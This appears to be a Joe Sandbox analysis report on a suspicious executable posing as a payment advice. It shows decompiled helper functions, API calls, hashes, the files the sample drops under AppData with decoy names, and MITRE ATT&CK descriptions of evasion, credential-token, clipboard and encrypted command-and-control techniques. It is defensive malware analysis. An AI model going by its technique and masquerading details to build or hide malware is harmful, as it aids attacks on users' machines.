Instruction ID: f5aaf9fad63db9690dbd9b3812727a8d708a0014de572c02bbf4379bbf317f26
Opcode Fuzzy Hash: 10c80b0613a78b839ad02c7969bec3604bf4f1206715e27e9f15991f3fdd17a2
Instruction Fuzzy Hash: 42F05E70906220ABCA217F64FE4CACB7BA4FB45B527014576F145B11E4C3799C8ACBDD

Uniqueness

Uniqueness Score: -1.00%

Function 00403703 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403703() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t8;

				_t8 =  *0x41eccc; // 0x7fc110
				_t3 = E004036E8(_t2, 0);
				if(_t8 != 0) {
					do {
						_t6 = _t8;
						_t8 =  *_t8;
						FreeLibrary( *(_t6 + 8));
						_t3 = GlobalFree(_t6);
					} while (_t8 != 0);
				}
				 *0x41eccc =  *0x41eccc & 0x00000000;
				return _t3;
			}

0x00403704
0x0040370c
0x00403713
0x00403716
0x00403716
0x00403718
0x0040371d
0x00403724
0x0040372a
0x0040372e
0x0040372f
0x00403737

APIs

FreeLibrary.KERNEL32(?,766DFA90,00000000,C:\Users\user\AppData\Local\Temp\,004036DB,004034F5,?,?,00000006,00000008,0000000A), ref: 0040371D
GlobalFree.KERNEL32 ref: 00403724

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00403703

Memory Dump Source

Source File: 00000000.00000002.823850662.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.823844110.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823867737.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823922822.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823922822.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823922822.000000000043F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ePAY-Advice_Rf[UC7749879100].jbxd

Similarity

API ID: Free$GlobalLibrary
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 1100898210-823278215
Opcode ID: 35d1f02da0abf4a3a5ea65bd0cdd12c9264502c99e7b9c945f64e5a7c8fdc6a2
Instruction ID: 9ffce7b129726733408ddd2483fbf3d013749e605b0eca4be9f0b214f3a53a2d
Opcode Fuzzy Hash: 35d1f02da0abf4a3a5ea65bd0cdd12c9264502c99e7b9c945f64e5a7c8fdc6a2
Instruction Fuzzy Hash: 25E01273805121A7C7355F56ED04B5E7768AF49B22F05806BEC407B3A0C7746C418BD9

Uniqueness

Uniqueness Score: -1.00%

Function 00405949 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405949(char* _a4) {
				char* _t3;
				char* _t5;

				_t5 = _a4;
				_t3 =  &(_t5[lstrlenA(_t5)]);
				while( *_t3 != 0x5c) {
					_t3 = CharPrevA(_t5, _t3);
					if(_t3 > _t5) {
						continue;
					}
					break;
				}
				 *_t3 =  *_t3 & 0x00000000;
				return  &(_t3[1]);
			}

0x0040594a
0x00405954
0x00405956
0x0040595d
0x00405965
0x00000000
0x00000000
0x00000000
0x00405965
0x00405967
0x0040596c

APIs

lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402DCF,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\ePAY-Advice_Rf[UC7749879100].exe,C:\Users\user\Desktop\ePAY-Advice_Rf[UC7749879100].exe,80000000,00000003), ref: 0040594F
CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402DCF,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\ePAY-Advice_Rf[UC7749879100].exe,C:\Users\user\Desktop\ePAY-Advice_Rf[UC7749879100].exe,80000000,00000003), ref: 0040595D

Strings

C:\Users\user\Desktop, xrefs: 00405949

Memory Dump Source

Source File: 00000000.00000002.823850662.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.823844110.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823867737.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823922822.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823922822.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823922822.000000000043F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ePAY-Advice_Rf[UC7749879100].jbxd

Similarity

API ID: CharPrevlstrlen
String ID: C:\Users\user\Desktop
API String ID: 2709904686-1246513382
Opcode ID: 714da30cf500cccbdd7b4a4277d37f3a4e299a669b52a45b343dae58782ad56f
Instruction ID: c4fcca613fcdd7c15110d01ecf8f186c4298fc2a4ba311cc039d9d6f64372384
Opcode Fuzzy Hash: 714da30cf500cccbdd7b4a4277d37f3a4e299a669b52a45b343dae58782ad56f
Instruction Fuzzy Hash: B7D0A7A3408D705EE3036310DC04B9F6A48CF12314F490062F080B61A5C67C1C424BAE

Uniqueness

Uniqueness Score: -1.00%

Function 6E1610E0 Relevance: 5.1, APIs: 4, Instructions: 102
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6E1610E0(void* _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				char* _t17;
				char _t19;
				void* _t20;
				void* _t24;
				void* _t27;
				void* _t31;
				void* _t37;
				void* _t39;
				void* _t40;
				signed int _t43;
				void* _t52;
				char* _t53;
				char* _t55;
				void* _t56;
				void* _t58;

				 *0x6e16405c = _a8;
				 *0x6e164060 = _a16;
				 *0x6e164064 = _a12;
				 *((intOrPtr*)(_a20 + 0xc))( *0x6e164038, E6E161556, _t52);
				_t43 =  *0x6e16405c +  *0x6e16405c * 4 << 2;
				_t17 = E6E16123B();
				_a8 = _t17;
				_t53 = _t17;
				if( *_t17 == 0) {
					L16:
					return GlobalFree(_a8);
				} else {
					do {
						_t19 =  *_t53;
						_t55 = _t53 + 1;
						_t58 = _t19 - 0x6c;
						if(_t58 > 0) {
							_t20 = _t19 - 0x70;
							if(_t20 == 0) {
								L12:
								_t53 = _t55 + 1;
								_t24 = E6E161266(E6E1612AD( *_t55 - 0x30));
								L13:
								GlobalFree(_t24);
								goto L14;
							}
							_t27 = _t20;
							if(_t27 == 0) {
								L10:
								_t53 = _t55 + 1;
								_t24 = E6E1612D1( *_t55 - 0x30, E6E16123B());
								goto L13;
							}
							L7:
							if(_t27 == 1) {
								_t31 = GlobalAlloc(0x40, _t43 + 4);
								 *_t31 =  *0x6e164030;
								 *0x6e164030 = _t31;
								E6E161508(_t31 + 4,  *0x6e164064, _t43);
								_t56 = _t56 + 0xc;
							}
							goto L14;
						}
						if(_t58 == 0) {
							L17:
							_t34 =  *0x6e164030;
							if( *0x6e164030 != 0) {
								E6E161508( *0x6e164064, _t34 + 4, _t43);
								_t37 =  *0x6e164030;
								_t56 = _t56 + 0xc;
								GlobalFree(_t37);
								 *0x6e164030 =  *_t37;
							}
							goto L14;
						}
						_t39 = _t19 - 0x4c;
						if(_t39 == 0) {
							goto L17;
						}
						_t40 = _t39 - 4;
						if(_t40 == 0) {
							 *_t55 =  *_t55 + 0xa;
							goto L12;
						}
						_t27 = _t40;
						if(_t27 == 0) {
							 *_t55 =  *_t55 + 0xa;
							goto L10;
						}
						goto L7;
						L14:
					} while ( *_t53 != 0);
					goto L16;
				}
			}

0x6e1610e7
0x6e1610ef
0x6e161103
0x6e16110b
0x6e161116
0x6e161119
0x6e161121
0x6e161124
0x6e161126
0x6e1611c4
0x6e1611d0
0x6e16112c
0x6e16112d
0x6e16112d
0x6e161130
0x6e161131
0x6e161134
0x6e161203
0x6e161206
0x6e16119e
0x6e1611a4
0x6e1611ac
0x6e1611b1
0x6e1611b4
0x00000000
0x6e1611b4
0x6e161209
0x6e16120a
0x6e161186
0x6e16118c
0x6e161194
0x00000000
0x6e161194
0x6e161152
0x6e161153
0x6e16115b
0x6e161168
0x6e161170
0x6e161179
0x6e16117e
0x6e16117e
0x00000000
0x6e161153
0x6e16113a
0x6e1611d1
0x6e1611d1
0x6e1611d8
0x6e1611e5
0x6e1611ea
0x6e1611ef
0x6e1611f5
0x6e1611fb
0x6e1611fb
0x00000000
0x6e1611d8
0x6e161140
0x6e161143
0x00000000
0x00000000
0x6e161149
0x6e16114c
0x6e16119b
0x00000000
0x6e16119b
0x6e16114f
0x6e161150
0x6e161183
0x00000000
0x6e161183
0x00000000
0x6e1611ba
0x6e1611ba
0x00000000
0x6e1611c3

APIs

GlobalAlloc.KERNEL32(00000040,?), ref: 6E16115B
GlobalFree.KERNEL32 ref: 6E1611B4
GlobalFree.KERNEL32 ref: 6E1611C7
GlobalFree.KERNEL32 ref: 6E1611F5

Memory Dump Source

Source File: 00000000.00000002.839140691.000000006E161000.00000020.00000001.01000000.00000005.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000000.00000002.839133432.000000006E160000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.839147920.000000006E163000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.839153984.000000006E165000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e160000_ePAY-Advice_Rf[UC7749879100].jbxd

Similarity

API ID: Global$Free$Alloc
String ID:
API String ID: 1780285237-0
Opcode ID: bc67ab67050579aab4cda4c5d3b6af14cc0d561a94e2ca7e72ffb70861c63965
Instruction ID: 0a6629d3c836fbab489be7b1f7aaf8eae079c6703542d79862ed112e7423f124
Opcode Fuzzy Hash: bc67ab67050579aab4cda4c5d3b6af14cc0d561a94e2ca7e72ffb70861c63965
Instruction Fuzzy Hash: 7C31B4B1604556AFDF81CFF4D868ABA7FF8FB17244B248415E848C2110D734CCAAEB10

Uniqueness

Uniqueness Score: -1.00%

Function 00405A68 Relevance: 5.0, APIs: 4, Instructions: 37
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405A68(void* __ecx, CHAR* _a4, CHAR* _a8) {
				int _v8;
				int _t12;
				int _t14;
				int _t15;
				CHAR* _t17;
				CHAR* _t27;

				_t12 = lstrlenA(_a8);
				_t27 = _a4;
				_v8 = _t12;
				while(lstrlenA(_t27) >= _v8) {
					_t14 = _v8;
					 *(_t14 + _t27) =  *(_t14 + _t27) & 0x00000000;
					_t15 = lstrcmpiA(_t27, _a8);
					_t27[_v8] =  *(_t14 + _t27);
					if(_t15 == 0) {
						_t17 = _t27;
					} else {
						_t27 = CharNextA(_t27);
						continue;
					}
					L5:
					return _t17;
				}
				_t17 = 0;
				goto L5;
			}

0x00405a78
0x00405a7a
0x00405a7d
0x00405aa9
0x00405a82
0x00405a8b
0x00405a90
0x00405a9b
0x00405a9e
0x00405aba
0x00405aa0
0x00405aa7
0x00000000
0x00405aa7
0x00405ab3
0x00405ab7
0x00405ab7
0x00405ab1
0x00000000

APIs

lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405CC3,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405A78
lstrcmpiA.KERNEL32(00000000,00000000,?,00000000,00405CC3,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405A90
CharNextA.USER32(00000000,?,00000000,00405CC3,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405AA1
lstrlenA.KERNEL32(00000000,?,00000000,00405CC3,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405AAA

Memory Dump Source

Source File: 00000000.00000002.823850662.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.823844110.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823867737.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823922822.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823922822.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823922822.000000000043F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ePAY-Advice_Rf[UC7749879100].jbxd

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: 57b21f4120e00b08a3941e9ed4e610408d9ca53935617fe6296070accebd3829
Instruction ID: 037941339f6bd63fe355126afe518e0153d46939b0274778cc0aadc7e03f3bf8
Opcode Fuzzy Hash: 57b21f4120e00b08a3941e9ed4e610408d9ca53935617fe6296070accebd3829
Instruction Fuzzy Hash: 29F0C231605414AFC702DBA5DC40D9FBBA8EF46350B2541A6E800F7251D234EE01AFA9

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	API monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer.Shutting down or rebooting systems may disrupt access to computer resources for legitimate users.
Tactics:	Impact
Data Sources:	Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report ePAY-Advice_Rf[UC7749879100].exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

Language, Device and Operating System Detection

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

World Map of Contacted IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\Kontos.ini

C:\Users\user\AppData\Local\Temp\nslD140.tmp\System.dll

C:\Users\user\AppData\Roaming\fumigatorium\Tertser\Omstrukturdnr\AEGISIIIRadeonHelper.dll

C:\Users\user\AppData\Roaming\fumigatorium\Tertser\Omstrukturdnr\Fatalismen.Int

C:\Users\user\AppData\Roaming\fumigatorium\Tertser\Omstrukturdnr\Provokations.Fje

C:\Users\user\AppData\Roaming\fumigatorium\Tertser\Omstrukturdnr\Rekapitulerer\Inseminerede79\avatar-default-symbolic.svg

C:\Users\user\AppData\Roaming\fumigatorium\Tertser\Omstrukturdnr\Rekapitulerer\Inseminerede79\be.txt

C:\Users\user\AppData\Roaming\fumigatorium\Tertser\Omstrukturdnr\Rekapitulerer\Inseminerede79\changes-allow-symbolic.svg

C:\Users\user\AppData\Roaming\fumigatorium\Tertser\Omstrukturdnr\Rekapitulerer\Inseminerede79\dotnet.api

C:\Users\user\AppData\Roaming\fumigatorium\Tertser\Omstrukturdnr\Rekapitulerer\Inseminerede79\ebook-reader.png

C:\Users\user\AppData\Roaming\fumigatorium\Tertser\Omstrukturdnr\Rekapitulerer\Inseminerede79\emblem-photos-symbolic.svg

C:\Users\user\AppData\Roaming\fumigatorium\Tertser\Omstrukturdnr\Rekapitulerer\Inseminerede79\font-select-symbolic.symbolic.png

C:\Users\user\AppData\Roaming\fumigatorium\Tertser\Omstrukturdnr\Rekapitulerer\Inseminerede79\network-wired-symbolic.symbolic.png

C:\Users\user\AppData\Roaming\fumigatorium\Tertser\Omstrukturdnr\Rekapitulerer\Inseminerede79\pan-start-symbolic.symbolic.png

C:\Users\user\AppData\Roaming\fumigatorium\Tertser\Omstrukturdnr\Rekapitulerer\Inseminerede79\printer-symbolic.symbolic.png

C:\Users\user\AppData\Roaming\fumigatorium\Tertser\Omstrukturdnr\Rekapitulerer\Inseminerede79\pt-br.txt

C:\Users\user\AppData\Roaming\fumigatorium\Tertser\Omstrukturdnr\omfartsvejene\Reberbanernes\Muhamedaneres\Sminknings\LogoCanary.png

Static File Info

General

File Icon

Static PE Info

General

Windows Analysis Report
ePAY-Advice_Rf[UC7749879100].exe

Function 004031D6 Relevance: 89.6, APIs: 32, Strings: 19, Instructions: 366
stringcomfileCOMMON

Function 00404A0E Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 481
windowmemoryCOMMONCrypto

Function 6E161A9C Relevance: 25.1, APIs: 13, Strings: 1, Instructions: 571
stringlibrarymemoryCOMMONCrypto

Function 00405732 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 159
filestringCOMMON

Function 004065F6 Relevance: 5.4, APIs: 4, Instructions: 382
COMMONCrypto

Function 0040626D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14
fileCOMMON

Function 00403B35 Relevance: 48.3, APIs: 32, Instructions: 346
windowstringCOMMON

Function 00403798 Relevance: 47.5, APIs: 14, Strings: 13, Instructions: 215
stringregistryCOMMON

Function 00402D63 Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 182
COMMON

Function 00405F8C Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 199
stringCOMMON

Function 00401759 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 147
stringtimeCOMMON

Function 00405557 Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 39
COMMON

Function 00406294 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36
libraryCOMMON

Function 00402F9C Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 155
COMMON

Function 00402003 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73
libraryloaderCOMMON

Function 00405B32 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 33
COMMON

Function 6E1616DF Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 120
COMMON

Function 00401C0A Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84
windowtimeCOMMON

Function 004023D6 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64
registrystringCOMMON

Function 6E1629C0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 156
COMMON

Function 004015BB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66
COMMON

Function 00405005 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46
windowCOMMON

Function 00405E51 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44
registryCOMMON

Function 00405609 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24
processCOMMON

Function 00406A2B Relevance: 5.2, APIs: 4, Instructions: 236
COMMON

Function 00406C2C Relevance: 5.2, APIs: 4, Instructions: 208
COMMON

Function 00406942 Relevance: 5.2, APIs: 4, Instructions: 205
COMMON

Function 00406447 Relevance: 5.2, APIs: 4, Instructions: 198
COMMON

Function 00406895 Relevance: 5.2, APIs: 4, Instructions: 180
COMMON

Function 004069B3 Relevance: 5.2, APIs: 4, Instructions: 170
COMMON

Function 004068FF Relevance: 5.2, APIs: 4, Instructions: 168
COMMON

Function 004024E5 Relevance: 4.5, APIs: 3, Instructions: 47
registryCOMMON